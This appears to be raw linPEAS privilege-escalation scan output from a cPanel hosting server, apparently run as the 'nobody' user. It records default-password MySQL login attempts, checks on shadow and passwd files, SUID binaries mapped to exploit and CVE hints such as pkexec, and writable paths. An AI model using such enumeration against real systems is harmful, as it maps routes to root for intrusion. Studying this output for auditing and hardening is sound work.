/usr/share/doc/krb5-libs-1.15.1/examples/krb5.conf [libdefaults] default_realm = ATHENA.MIT.EDU [realms] # use "kdc = ..." if realm admins haven't put SRV records into DNS ATHENA.MIT.EDU = { admin_server = kerberos.mit.edu } ANDREW.CMU.EDU = { admin_server = kdc-01.andrew.cmu.edu } [domain_realm] mit.edu = ATHENA.MIT.EDU csail.mit.edu = CSAIL.MIT.EDU .ucsc.edu = CATS.UCSC.EDU [logging] # kdc = CONSOLE tickets kerberos Not Found klist Not Found  ╔══════════╣ Searching mysql credentials and exec From '/etc/logrotate.d/mysql' Mysql user: ╔══════════╣ MySQL version mysql Ver 14.14 Distrib 5.6.51, for Linux (x86_64) using EditLine wrapper ═╣ MySQL connection using default root/root ........... No ═╣ MySQL connection using root/toor ................... No ═╣ MySQL connection using root/NOPASS ................. No  ╔══════════╣ Analyzing PGP-GPG Files (limit 70) /bin/gpg gpg Not Found netpgpkeys Not Found netpgp Not Found  -rw-r--r-- 1 root root 9551 Jul 31 2019 /usr/lib/systemd/import-pubring.gpg ╔══════════╣ Searching uncommon passwd files (splunk) passwd file: /etc/pam.d/passwd passwd file: /etc/passwd passwd file: /usr/share/bash-completion/completions/passwd ╔══════════╣ Searching ssl/ssh files ╔══════════╣ Analyzing SSH Files (limit 70)  -rw-r--r--. 1 root root 162 Jun 17 2015 /etc/ssh/ssh_host_ecdsa_key.pub -rw-r--r--. 1 root root 82 Jun 17 2015 /etc/ssh/ssh_host_ed25519_key.pub -rw-r--r--. 1 root root 382 Jun 17 2015 /etc/ssh/ssh_host_rsa_key.pub -rw-r--r--. 1 root root 1665 May 12 2006 /usr/share/doc/pygpgme-0.3/tests/keys/key1.pub -rw-r--r--. 1 root root 3181 May 12 2006 /usr/share/doc/pygpgme-0.3/tests/keys/key2.pub -rw-r--r--. 1 root root 908 May 12 2006 /usr/share/doc/pygpgme-0.3/tests/keys/passphrase.pub -rw-r--r--. 1 root root 1454 May 12 2006 /usr/share/doc/pygpgme-0.3/tests/keys/revoked.pub -rw-r--r--. 1 root root 4046 May 12 2006 /usr/share/doc/pygpgme-0.3/tests/keys/signonly.pub ══╣ Possible private SSH keys were found! /etc/ImageMagick/mime.xml ══╣ Some certificates were found (out limited): /etc/apache2/conf.d/ssl.crt /etc/apache2/conf.d/ssl.crt/server.crt /etc/dovecot/dh.pem /etc/dovecot/ffdhe2048.pem /etc/dovecot/ffdhe3072.pem /etc/dovecot/ffdhe4096.pem /etc/pki/ca-trust/extracted/pem/objsign-ca-bundle.pem /etc/pki/ca-trust/source/ca-bundle.legacy.crt /etc/pki/tls/certs/ns1.aarms.com.crt /etc/pki/tls/certs/ns1.miisky.com.crt /usr/local/python3.6/lib/python3.7/test/allsans.pem /usr/local/python3.6/lib/python3.7/test/badcert.pem /usr/local/python3.6/lib/python3.7/test/badkey.pem /usr/local/python3.6/lib/python3.7/test/dh1024.pem /usr/local/python3.6/lib/python3.7/test/keycert.passwd.pem /usr/local/python3.6/lib/python3.7/test/keycert.pem /usr/local/python3.6/lib/python3.7/test/keycert2.pem /usr/local/python3.6/lib/python3.7/test/nullcert.pem /usr/local/python3.6/lib/python3.7/test/pycakey.pem /usr/local/python3.6/lib/python3.7/test/selfsigned_pythontestdotnet.pem 6748PSTORAGE_CERTSBIN ══╣ /etc/hosts.allow file found, trying to read the rules: /etc/hosts.allow Searching inside /etc/ssh/ssh_config for interesting info Host * GSSAPIAuthentication yes ForwardX11Trusted yes SendEnv LANG LC_CTYPE LC_NUMERIC LC_TIME LC_COLLATE LC_MONETARY LC_MESSAGES SendEnv LC_PAPER LC_NAME LC_ADDRESS LC_TELEPHONE LC_MEASUREMENT SendEnv LC_IDENTIFICATION LC_ALL LANGUAGE SendEnv XMODIFIERS  ╔════════════════════════════════════╗ ══════════════════════╣ Files with Interesting Permissions ╠══════════════════════  β•šβ•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β• ╔══════════╣ SUID - Check easy privesc, exploits and write perms β•š https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sudo-and-suid -rwsr-xr-x 1 root root 63K Mar 14 2019 /usr/bin/chage -rws--x--x 1 root root 24K Mar 14 2019 /usr/bin/chfn ---> SuSE_9.3/10 -rwsr-xr-x 1 root root 77K Mar 14 2019 /usr/bin/gpasswd -rwsr-xr-x 1 root root 41K Mar 14 2019 /usr/bin/newgrp ---> HP-UX_10.20 -rwsr-xr-x 1 root root 44K Mar 14 2019 /usr/bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8 -rwsr-x--- 1 root wheel 32K Mar 14 2019 /usr/bin/su -rwsr-xr-x 1 root root 32K Mar 14 2019 /usr/bin/umount ---> BSD/Linux(08-1996) -rwsr-xr-x 1 root root 84K Apr 11 2018 /usr/bin/quota ---s--x--- 1 root stapusr 204K Nov 1 2018 /usr/bin/staprun -rwsr-xr-x. 1 root root 28K Jun 10 2014 /usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997) -rwsr-xr-x 1 root root 52K Oct 30 2018 /usr/bin/at ---> RTru64_UNIX_4.0g(CVE-2002-1614) -rwsr-xr-x 1 root root 57K Nov 20 2018 /usr/bin/crontab -rwsr-xr-x 1 root root 24K Mar 8 2019 /usr/bin/pkexec ---> Linux4.10_to_5.1.17(CVE-2019-13272)/rhel_6(CVE-2011-1485)/Generic_CVE-2021-4034 ---s--x--x 1 root root 144K Oct 31 2018 /usr/bin/sudo ---> check_if_the_sudo_version_is_vulnerable -rwsr-xr-x 1 root root 11K Apr 11 2018 /usr/sbin/pam_timestamp_check -rwsr-xr-x 1 root root 36K Apr 11 2018 /usr/sbin/unix_chkpwd -rwsr-xr-x 1 root root 12K Oct 31 2018 /usr/sbin/usernetctl -rwsr-xr-x 1 root nobody 20K Jul 2 2019 /usr/sbin/suexec -rwsr-x--- 1 root nobody 2.5M Jul 24 2019 /usr/sbin/suphp (Unknown SUID binary!) -rwsr-xr-x 1 root root 1.5M Mar 21 22:44 /usr/sbin/exim (Unknown SUID binary!) -rwsr-xr-x 1 root root 115K Oct 14 2021 /usr/sbin/mount.nfs -rwsr-xr-x 1 root root 16K Mar 8 2019 /usr/lib/polkit-1/polkit-agent-helper-1 -rwsr-sr-x 1 abrt abrt 16K Nov 13 2018 /usr/libexec/abrt-action-install-debuginfo-to-abrt-cache ---> CENTOS -rwsr-x--- 1 root dbus 57K Mar 14 2019 /usr/libexec/dbus-1/dbus-daemon-launch-helper -r-sr-xr-x 1 root root 197K Aug 3 2015 /usr/local/nagios/libexec/check_dhcp (Unknown SUID binary!) -r-sr-xr-x 1 root root 209K Aug 3 2015 /usr/local/nagios/libexec/check_icmp (Unknown SUID binary!) -rwsr-xr-x. 1 root root 10K Aug 23 2014 /vmware-tools-distrib/lib/bin64/vmware-user-suid-wrapper -rwsr-xr-x. 1 root root 9.4K Aug 23 2014 /vmware-tools-distrib/lib/bin32/vmware-user-suid-wrapper ╔══════════╣ SGID β•š https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sudo-and-suid -r-xr-sr-x. 1 root tty 15K Jun 10 2014 /usr/bin/wall -rwxr-sr-x 1 root tty 20K Mar 14 2019 /usr/bin/write ---x--s--x 1 root nobody 374K Apr 11 2018 /usr/bin/ssh-agent -rwx--s--x 1 root slocate 40K Apr 11 2018 /usr/bin/locate -rwxr-sr-x 1 root screen 465K Apr 11 2018 /usr/bin/screen ---> GNU_Screen_4.5.0 -rwxr-sr-x 1 root root 7.1K Oct 31 2018 /usr/sbin/netreport -rwxr-sr-x 1 root mailtrap 14K Mar 21 22:44 /usr/sbin/sendmail ---> Sendmail_8.10.1/Sendmail_8.11.x/Linux_Kernel_2.2.x_2.4.0-test1_(SGI_ProPack_1.2/1.3) ---x--s--x 1 root ssh_keys 459K Apr 11 2018 /usr/libexec/openssh/ssh-keysign -rwsr-sr-x 1 abrt abrt 16K Nov 13 2018 /usr/libexec/abrt-action-install-debuginfo-to-abrt-cache ---> CENTOS ╔══════════╣ Files with ACLs (limited to 50) β•š https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#acls files with acls in searched folders Not Found  ╔══════════╣ Capabilities β•š https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#capabilities ══╣ Current shell capabilities CapInh: 0x0000000000000000= CapPrm: 0x0000000000000000= CapEff: 0x0000000000000000= CapBnd: 0x0000001fffffffff=cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,35,36 CapAmb: 0x0000000000000000= β•š Parent process capabilities CapInh: 0x0000000000000000= CapPrm: 0x0000000000000000= CapEff: 0x0000000000000000= CapBnd: 0x0000001fffffffff=cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,35,36 CapAmb: 0x0000000000000000= Files with capabilities (limited to 50): /usr/bin/ping = cap_net_admin,cap_net_raw+p /usr/sbin/suexec = cap_setgid,cap_setuid+ep /usr/sbin/arping = cap_net_raw+p /usr/sbin/clockdiff = cap_net_raw+p /usr/sbin/mtr = cap_net_raw+ep ╔══════════╣ Checking misconfigurations of ld.so β•š https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#ldso /etc/ld.so.conf Content of /etc/ld.so.conf: include ld.so.conf.d/*.conf ld.so.conf.d  ld.so.conf.d/* cat: ld.so.conf.d/*: No such file or directory /etc/ld.so.preload ╔══════════╣ Files (scripts) in /etc/profile.d/ β•š https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#profiles-files total 120 drwxr-xr-x. 2 root root 4096 Dec 8 2023 . drwxr-xr-x. 121 root root 12288 May 23 17:20 .. -rw-r--r-- 1 root root 771 Oct 31 2018 256term.csh -rw-r--r-- 1 root root 841 Oct 31 2018 256term.sh -rw-r--r-- 1 root root 1348 Nov 13 2018 abrt-console-notification.sh -rw-r--r--. 1 root root 660 Jun 10 2014 bash_completion.sh -rw-r--r-- 1 root root 69 Aug 7 2017 bash_timestamps.sh -rw-r--r-- 1 root root 196 Mar 24 2017 colorgrep.csh -rw-r--r-- 1 root root 201 Mar 24 2017 colorgrep.sh -rw-r--r-- 1 root root 1741 Oct 30 2018 colorls.csh -rw-r--r-- 1 root root 1606 Oct 30 2018 colorls.sh -rwxr-xr-x 1 root root 548 Nov 3 2023 cpanel-php-composer.sh -rw-r--r-- 1 root root 358 Nov 2 2017 cpanel-user-commands.sh -rw-r--r-- 1 root root 80 Oct 31 2018 csh.local -rw-r--r-- 1 root root 1706 Oct 31 2018 lang.csh -rw-r--r-- 1 root root 2703 Oct 31 2018 lang.sh -rw-r--r-- 1 root root 123 Jul 31 2015 less.csh -rw-r--r-- 1 root root 121 Jul 31 2015 less.sh -rwxr-xr-x 1 root root 240 Aug 7 2017 locallib.csh -rwxr-xr-x 1 root root 272 Aug 7 2017 locallib.sh -rwxr-xr-x 1 root root 37 Feb 7 2017 os-security.sh -rw------- 1 root root 48 Jul 3 2019 python3.7.sh -rw-r--r-- 1 root root 81 Oct 31 2018 sh.local -rw-r--r-- 1 root root 105 Jun 28 2019 vim.csh -rw-r--r-- 1 root root 269 Jun 28 2019 vim.sh -rw-r--r--. 1 root root 164 Jan 28 2014 which2.csh -rw-r--r--. 1 root root 169 Jan 28 2014 which2.sh ╔══════════╣ Permissions in init, init.d, systemd, and rc.d β•š https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#init-initd-systemd-and-rcd  ═╣ Hashes inside passwd file? ........... No ═╣ Writable passwd file? ................ No ═╣ Credentials in fstab/mtab? ........... No ═╣ Can I read shadow files? ............. No ═╣ Can I read shadow plists? ............ No ═╣ Can I write shadow plists? ........... No ═╣ Can I read opasswd file? ............. No ═╣ Can I write in network-scripts? ...... No ═╣ Can I read root folder? .............. No  ╔══════════╣ Searching root files in home dirs (limit 30) /home/ /root/ /var/www /var/www/cgi-bin /var/www/html /var/www/html/400.shtml /var/www/html/401.shtml /var/www/html/403.shtml /var/www/html/404.shtml /var/www/html/413.shtml /var/www/html/500.shtml /var/www/html/cp_errordocument.shtml /var/www/html/index.html /var/www/html/suspended.page /var/www/html/suspended.page/index.html /var/www/html/.well-known /var/www/html/.well-known/pki-validation /var/www/html/.well-known/pki-validation/51065C27A8C3FFD02217F83282EDE214.txt /var/www/html/.well-known/pki-validation/C5352B49F0027A4DEB6833D1F0AB9ECD.txt /var/www/html/.well-known/pki-validation/7F6BF68B9A61E06F127FA47C420F1AA3.txt /var/www/html/.well-known/pki-validation/0ACB14A369FB93863EC208B4914172AE.txt /var/www/html/.well-known/pki-validation/CD992C90A70B106A4C6C975109E26F24.txt /var/www/html/.well-known/pki-validation/F29E747DFD32220E94A41984A748B761.txt /var/www/html/.well-known/pki-validation/C36C8DD907A2A7AFB3C8F096217C19A0.txt /var/www/html/.well-known/pki-validation/E876F34D0778207D7ADD8F6EB19A5B97.txt /var/www/html/.well-known/pki-validation/B9E182CD5085D4C47EEC9E1F38DCB3B3.txt /var/www/html/.well-known/pki-validation/B5DE5306FAF688A71485F739351EDE6B.txt /var/www/html/.well-known/pki-validation/12E068CE2D3EEE3ACC7BDF72FC162710.txt /var/www/html/.well-known/pki-validation/6170AE956D4159C0147B629B1CC9B353.txt /var/www/html/.well-known/pki-validation/ED96C27C4EA6B337D1A28876AB5352D5.txt ╔══════════╣ Searching folders owned by me containing others files on it (limit 100) -rw------- 1 root root 0 Dec 3 2017 /opt/cpanel/ea-php55/root/usr/var/log/php-fpm/error.log -rw------- 1 root root 0 Dec 3 2017 /opt/cpanel/ea-php56/root/usr/var/log/php-fpm/error.log -rw------- 1 root root 0 Dec 3 2017 /opt/cpanel/ea-php70/root/usr/var/log/php-fpm/error.log -rw------- 1 root root 233 Nov 1 2017 /opt/cpanel/ea-php55/root/usr/var/log/php-fpm/error.log-20171102 -rw------- 1 root root 233 Nov 1 2017 /opt/cpanel/ea-php56/root/usr/var/log/php-fpm/error.log-20171102 -rw------- 1 root root 233 Nov 1 2017 /opt/cpanel/ea-php70/root/usr/var/log/php-fpm/error.log-20171102 -rw------- 1 root root 233 Nov 8 2017 /opt/cpanel/ea-php55/root/usr/var/log/php-fpm/error.log-20171109 -rw------- 1 root root 233 Nov 8 2017 /opt/cpanel/ea-php56/root/usr/var/log/php-fpm/error.log-20171109 -rw------- 1 root root 233 Nov 8 2017 /opt/cpanel/ea-php70/root/usr/var/log/php-fpm/error.log-20171109 -rw------- 1 root root 233 Nov 25 2017 /opt/cpanel/ea-php55/root/usr/var/log/php-fpm/error.log-20171126 -rw------- 1 root root 233 Nov 25 2017 /opt/cpanel/ea-php56/root/usr/var/log/php-fpm/error.log-20171126 -rw------- 1 root root 233 Nov 25 2017 /opt/cpanel/ea-php70/root/usr/var/log/php-fpm/error.log-20171126 -rw------- 1 root root 233 Nov 30 2017 /opt/cpanel/ea-php55/root/usr/var/log/php-fpm/error.log-20171203 -rw------- 1 root root 233 Nov 30 2017 /opt/cpanel/ea-php56/root/usr/var/log/php-fpm/error.log-20171203 -rw------- 1 root root 233 Nov 30 2017 /opt/cpanel/ea-php70/root/usr/var/log/php-fpm/error.log-20171203 ╔══════════╣ Readable files belonging to root and readable by me but not world readable -rwsr-x--- 1 root nobody 2602491 Jul 24 2019 /usr/sbin/suphp ╔══════════╣ Interesting writable files owned by me or writable by everyone (not in Home) (max 200) β•š https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#writable-files /dev/mqueue /dev/shm /opt/cpanel/ea-php55/root/usr/var/log/php-fpm /opt/cpanel/ea-php56/root/usr/var/log/php-fpm /opt/cpanel/ea-php70/root/usr/var/log/php-fpm /run/faillock/nobody /tmp /tmp/.ICE-unix /tmp/.Test-unix /tmp/.X11-unix /tmp/.XIM-unix /tmp/.font-unix #)You_can_write_even_more_files_inside_last_directory  /tmp/yum-nobody-GKUGT1/x86_64 /tmp/yum-nobody-GKUGT1/x86_64/7 /tmp/yum-nobody-GKUGT1/x86_64/7/EA4 /tmp/yum-nobody-GKUGT1/x86_64/7/EA4/cachecookie /tmp/yum-nobody-GKUGT1/x86_64/7/EA4/gen /tmp/yum-nobody-GKUGT1/x86_64/7/EA4/mirrorlist.txt /tmp/yum-nobody-GKUGT1/x86_64/7/EA4/packages /tmp/yum-nobody-GKUGT1/x86_64/7/EA4/repomd.xml /tmp/yum-nobody-GKUGT1/x86_64/7/base /tmp/yum-nobody-GKUGT1/x86_64/7/base/cachecookie /tmp/yum-nobody-GKUGT1/x86_64/7/base/gen /tmp/yum-nobody-GKUGT1/x86_64/7/base/packages /tmp/yum-nobody-GKUGT1/x86_64/7/base/repomd.xml /tmp/yum-nobody-GKUGT1/x86_64/7/cpanel-addons-production-feed /tmp/yum-nobody-GKUGT1/x86_64/7/cpanel-addons-production-feed/cachecookie /tmp/yum-nobody-GKUGT1/x86_64/7/cpanel-addons-production-feed/gen /tmp/yum-nobody-GKUGT1/x86_64/7/cpanel-addons-production-feed/mirrorlist.txt /tmp/yum-nobody-GKUGT1/x86_64/7/cpanel-addons-production-feed/packages /tmp/yum-nobody-GKUGT1/x86_64/7/cpanel-addons-production-feed/repomd.xml /tmp/yum-nobody-GKUGT1/x86_64/7/epel /tmp/yum-nobody-GKUGT1/x86_64/7/epel/cachecookie /tmp/yum-nobody-GKUGT1/x86_64/7/epel/gen /tmp/yum-nobody-GKUGT1/x86_64/7/epel/metalink.xml /tmp/yum-nobody-GKUGT1/x86_64/7/epel/packages /tmp/yum-nobody-GKUGT1/x86_64/7/epel/repomd.xml /tmp/yum-nobody-GKUGT1/x86_64/7/extras /tmp/yum-nobody-GKUGT1/x86_64/7/extras/cachecookie /tmp/yum-nobody-GKUGT1/x86_64/7/extras/gen /tmp/yum-nobody-GKUGT1/x86_64/7/extras/packages /tmp/yum-nobody-GKUGT1/x86_64/7/extras/repomd.xml /tmp/yum-nobody-GKUGT1/x86_64/7/imunify360 /tmp/yum-nobody-GKUGT1/x86_64/7/imunify360/cachecookie /tmp/yum-nobody-GKUGT1/x86_64/7/imunify360/gen /tmp/yum-nobody-GKUGT1/x86_64/7/imunify360/packages /tmp/yum-nobody-GKUGT1/x86_64/7/imunify360/repomd.xml /tmp/yum-nobody-GKUGT1/x86_64/7/spacewalk-client /tmp/yum-nobody-GKUGT1/x86_64/7/spacewalk-client/cachecookie /tmp/yum-nobody-GKUGT1/x86_64/7/spacewalk-client/gen /tmp/yum-nobody-GKUGT1/x86_64/7/spacewalk-client/packages /tmp/yum-nobody-GKUGT1/x86_64/7/spacewalk-client/repomd.xml /tmp/yum-nobody-GKUGT1/x86_64/7/updates /tmp/yum-nobody-GKUGT1/x86_64/7/updates/cachecookie /tmp/yum-nobody-GKUGT1/x86_64/7/updates/gen /tmp/yum-nobody-GKUGT1/x86_64/7/updates/packages /tmp/yum-nobody-GKUGT1/x86_64/7/updates/repomd.xml /tmp/yum-nobody-GKUGT1/x86_64/7/wp-toolkit-cpanel /tmp/yum-nobody-GKUGT1/x86_64/7/wp-toolkit-cpanel/cachecookie /tmp/yum-nobody-GKUGT1/x86_64/7/wp-toolkit-cpanel/gen /tmp/yum-nobody-GKUGT1/x86_64/7/wp-toolkit-cpanel/packages /tmp/yum-nobody-GKUGT1/x86_64/7/wp-toolkit-cpanel/repomd.xml /tmp/yum-nobody-GKUGT1/x86_64/7/wp-toolkit-thirdparties /tmp/yum-nobody-GKUGT1/x86_64/7/wp-toolkit-thirdparties/cachecookie /tmp/yum-nobody-GKUGT1/x86_64/7/wp-toolkit-thirdparties/gen /tmp/yum-nobody-GKUGT1/x86_64/7/wp-toolkit-thirdparties/packages /tmp/yum-nobody-GKUGT1/x86_64/7/wp-toolkit-thirdparties/repomd.xml /tmp/yum-nobody-GKUGT1/x86_64/7/zabbix /tmp/yum-nobody-GKUGT1/x86_64/7/zabbix-non-supported /tmp/yum-nobody-GKUGT1/x86_64/7/zabbix-non-supported/cachecookie /tmp/yum-nobody-GKUGT1/x86_64/7/zabbix-non-supported/gen /tmp/yum-nobody-GKUGT1/x86_64/7/zabbix-non-supported/packages /tmp/yum-nobody-GKUGT1/x86_64/7/zabbix-non-supported/repomd.xml /tmp/yum-nobody-GKUGT1/x86_64/7/zabbix/cachecookie /tmp/yum-nobody-GKUGT1/x86_64/7/zabbix/gen /tmp/yum-nobody-GKUGT1/x86_64/7/zabbix/packages /tmp/yum-nobody-GKUGT1/x86_64/7/zabbix/repomd.xml /var/cache/apache2 /var/cache/apache2/proxy /var/tmp /var/tmp/.ICE-unix /var/tmp/.Test-unix /var/tmp/.X11-unix /var/tmp/.XIM-unix /var/tmp/.font-unix #)You_can_write_even_more_files_inside_last_directory  /var/tmp/yum-nobody-GKUGT1/x86_64 /var/tmp/yum-nobody-GKUGT1/x86_64/7 /var/tmp/yum-nobody-GKUGT1/x86_64/7/EA4 /var/tmp/yum-nobody-GKUGT1/x86_64/7/EA4/cachecookie /var/tmp/yum-nobody-GKUGT1/x86_64/7/EA4/gen /var/tmp/yum-nobody-GKUGT1/x86_64/7/EA4/mirrorlist.txt /var/tmp/yum-nobody-GKUGT1/x86_64/7/EA4/packages /var/tmp/yum-nobody-GKUGT1/x86_64/7/EA4/repomd.xml /var/tmp/yum-nobody-GKUGT1/x86_64/7/base /var/tmp/yum-nobody-GKUGT1/x86_64/7/base/cachecookie /var/tmp/yum-nobody-GKUGT1/x86_64/7/base/gen /var/tmp/yum-nobody-GKUGT1/x86_64/7/base/packages /var/tmp/yum-nobody-GKUGT1/x86_64/7/base/repomd.xml /var/tmp/yum-nobody-GKUGT1/x86_64/7/cpanel-addons-production-feed /var/tmp/yum-nobody-GKUGT1/x86_64/7/cpanel-addons-production-feed/cachecookie /var/tmp/yum-nobody-GKUGT1/x86_64/7/cpanel-addons-production-feed/gen /var/tmp/yum-nobody-GKUGT1/x86_64/7/cpanel-addons-production-feed/mirrorlist.txt /var/tmp/yum-nobody-GKUGT1/x86_64/7/cpanel-addons-production-feed/packages /var/tmp/yum-nobody-GKUGT1/x86_64/7/cpanel-addons-production-feed/repomd.xml /var/tmp/yum-nobody-GKUGT1/x86_64/7/epel /var/tmp/yum-nobody-GKUGT1/x86_64/7/epel/cachecookie /var/tmp/yum-nobody-GKUGT1/x86_64/7/epel/gen /var/tmp/yum-nobody-GKUGT1/x86_64/7/epel/metalink.xml /var/tmp/yum-nobody-GKUGT1/x86_64/7/epel/packages /var/tmp/yum-nobody-GKUGT1/x86_64/7/epel/repomd.xml /var/tmp/yum-nobody-GKUGT1/x86_64/7/extras /var/tmp/yum-nobody-GKUGT1/x86_64/7/extras/cachecookie /var/tmp/yum-nobody-GKUGT1/x86_64/7/extras/gen /var/tmp/yum-nobody-GKUGT1/x86_64/7/extras/packages /var/tmp/yum-nobody-GKUGT1/x86_64/7/extras/repomd.xml /var/tmp/yum-nobody-GKUGT1/x86_64/7/imunify360 /var/tmp/yum-nobody-GKUGT1/x86_64/7/imunify360/cachecookie /var/tmp/yum-nobody-GKUGT1/x86_64/7/imunify360/gen /var/tmp/yum-nobody-GKUGT1/x86_64/7/imunify360/packages /var/tmp/yum-nobody-GKUGT1/x86_64/7/imunify360/repomd.xml /var/tmp/yum-nobody-GKUGT1/x86_64/7/spacewalk-client /var/tmp/yum-nobody-GKUGT1/x86_64/7/spacewalk-client/cachecookie /var/tmp/yum-nobody-GKUGT1/x86_64/7/spacewalk-client/gen /var/tmp/yum-nobody-GKUGT1/x86_64/7/spacewalk-client/packages /var/tmp/yum-nobody-GKUGT1/x86_64/7/spacewalk-client/repomd.xml /var/tmp/yum-nobody-GKUGT1/x86_64/7/updates /var/tmp/yum-nobody-GKUGT1/x86_64/7/updates/cachecookie /var/tmp/yum-nobody-GKUGT1/x86_64/7/updates/gen /var/tmp/yum-nobody-GKUGT1/x86_64/7/updates/packages /var/tmp/yum-nobody-GKUGT1/x86_64/7/updates/repomd.xml /var/tmp/yum-nobody-GKUGT1/x86_64/7/wp-toolkit-cpanel /var/tmp/yum-nobody-GKUGT1/x86_64/7/wp-toolkit-cpanel/cachecookie /var/tmp/yum-nobody-GKUGT1/x86_64/7/wp-toolkit-cpanel/gen /var/tmp/yum-nobody-GKUGT1/x86_64/7/wp-toolkit-cpanel/packages /var/tmp/yum-nobody-GKUGT1/x86_64/7/wp-toolkit-cpanel/repomd.xml /var/tmp/yum-nobody-GKUGT1/x86_64/7/wp-toolkit-thirdparties /var/tmp/yum-nobody-GKUGT1/x86_64/7/wp-toolkit-thirdparties/cachecookie /var/tmp/yum-nobody-GKUGT1/x86_64/7/wp-toolkit-thirdparties/gen /var/tmp/yum-nobody-GKUGT1/x86_64/7/wp-toolkit-thirdparties/packages /var/tmp/yum-nobody-GKUGT1/x86_64/7/wp-toolkit-thirdparties/repomd.xml /var/tmp/yum-nobody-GKUGT1/x86_64/7/zabbix /var/tmp/yum-nobody-GKUGT1/x86_64/7/zabbix-non-supported /var/tmp/yum-nobody-GKUGT1/x86_64/7/zabbix-non-supported/cachecookie /var/tmp/yum-nobody-GKUGT1/x86_64/7/zabbix-non-supported/gen /var/tmp/yum-nobody-GKUGT1/x86_64/7/zabbix-non-supported/packages /var/tmp/yum-nobody-GKUGT1/x86_64/7/zabbix-non-supported/repomd.xml /var/tmp/yum-nobody-GKUGT1/x86_64/7/zabbix/cachecookie /var/tmp/yum-nobody-GKUGT1/x86_64/7/zabbix/gen /var/tmp/yum-nobody-GKUGT1/x86_64/7/zabbix/packages /var/tmp/yum-nobody-GKUGT1/x86_64/7/zabbix/repomd.xml ╔══════════╣ Interesting GROUP writable files (not in Home) (max 200) β•š https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#writable-files   ╔═════════════════════════╗ ════════════════════════════╣ Other Interesting Files ╠════════════════════════════  β•šβ•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β• ╔══════════╣ .sh files in path β•š https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#scriptbinaries-in-path /usr/sbin/pm-utils-bugreport-info.sh /usr/bin/lesspipe.sh /usr/bin/gettext.sh /usr/bin/setup-nsssysinit.sh /usr/bin/unix-lpr.sh /usr/bin/lprsetup.sh /usr/bin/isc-config.sh ╔══════════╣ Executable files potentially added by user (limit 70) 2025-05-01+22:26:45.6295003220 /etc/systemd/system/ror 2019-08-07+08:56:54.9687279700 /usr/bin/virtualenv 2019-08-06+15:22:08.1389506180 /usr/bin/tensorboard 2019-08-06+15:21:54.7119508490 /usr/bin/saved_model_cli 2019-08-06+15:21:54.7109508490 /usr/bin/tf_upgrade_v2 2019-08-06+15:21:54.7109508490 /usr/bin/freeze_graph 2019-08-06+15:21:54.7099508490 /usr/bin/toco_from_protos 2019-08-06+15:21:54.7089508490 /usr/bin/toco 2019-08-06+15:21:54.7089508490 /usr/bin/tflite_convert 2019-08-06+15:19:08.4399537090 /usr/bin/jupyter-qtconsole 2019-08-06+15:17:56.0509549540 /usr/bin/pygmentize 2019-08-06+15:16:54.6699560100 /usr/bin/pbr 2019-08-06+15:16:40.3649562560 /usr/bin/f2py2.7 2019-08-06+15:16:40.3639562560 /usr/bin/f2py2 2019-08-06+15:16:40.3639562560 /usr/bin/f2py 2019-08-06+15:16:24.4049565310 /usr/bin/jupyter-serverextension 2019-08-06+15:16:24.4049565310 /usr/bin/jupyter-notebook 2019-08-06+15:16:24.4049565310 /usr/bin/jupyter-bundlerextension 2019-08-06+15:16:24.4039565310 /usr/bin/jupyter-nbextension 2019-08-06+15:16:03.1399568960 /usr/bin/jupyter-nbconvert 2019-08-06+15:15:16.5939576970 /usr/bin/markdown_py 2019-08-06+15:14:52.0189581200 /usr/bin/jupyter-troubleshoot 2019-08-06+15:14:52.0189581200 /usr/bin/jupyter-migrate 2019-08-06+15:14:52.0179581200 /usr/bin/jupyter 2019-08-06+15:14:45.1199582390 /usr/bin/jupyter-kernel 2019-08-06+15:14:45.1189582390 /usr/bin/jupyter-run 2019-08-06+15:14:45.1189582390 /usr/bin/jupyter-kernelspec 2019-08-06+15:14:39.6479583330 /usr/bin/jsonschema 2019-08-06+15:14:13.3299587850 /usr/bin/ipython2 2019-08-06+15:14:13.3299587850 /usr/bin/iptest 2019-08-06+15:14:13.3289587860 /usr/bin/iptest2 2019-08-06+15:14:13.3279587860 /usr/bin/ipython 2019-02-07+22:27:17.2111039410 /etc/rc.d/init.d/filelimits 2018-01-25+12:36:33.5400956950 /usr/bin/chardetect 2018-01-25+11:40:24.7853207790 /usr/bin/jupyter-console 2018-01-25+11:40:22.4244016450 